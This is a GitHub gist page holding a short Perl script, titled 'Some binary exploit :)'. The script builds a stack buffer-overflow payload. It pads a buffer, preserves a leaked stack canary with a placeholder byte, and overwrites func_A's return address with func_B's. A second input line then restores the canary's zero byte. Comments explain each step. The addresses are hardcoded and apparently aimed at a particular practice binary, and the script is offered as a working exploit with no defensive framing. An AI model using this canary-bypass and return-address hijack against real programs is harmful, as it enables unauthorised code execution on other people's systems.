Created
February 20, 2014 20:38
-
-
Save ramntry/9122738 to your computer and use it in GitHub Desktop.
Some binary exploit :)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env perl | |
print "a" x 32; # fill some buffer gap | |
print "Z"."\x45\x8b\x6b"; # save the canary unchanged but use a temporary byte instead zero-byte to prolong c-string in memory | |
print "b" x 12; # fill some another gap | |
print "\x5b\x85\x04\x08"; # override the func_A() return address from main() body to func_B() beginning | |
print "\xd3\x94\xe1\xf7"; # write the func_B() return address equal to main() one | |
print "\n"; # return from first gets() call and wait for another one | |
print "c" x 32; # replace the temporary byte denoting zero-byte within canary with real zero |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment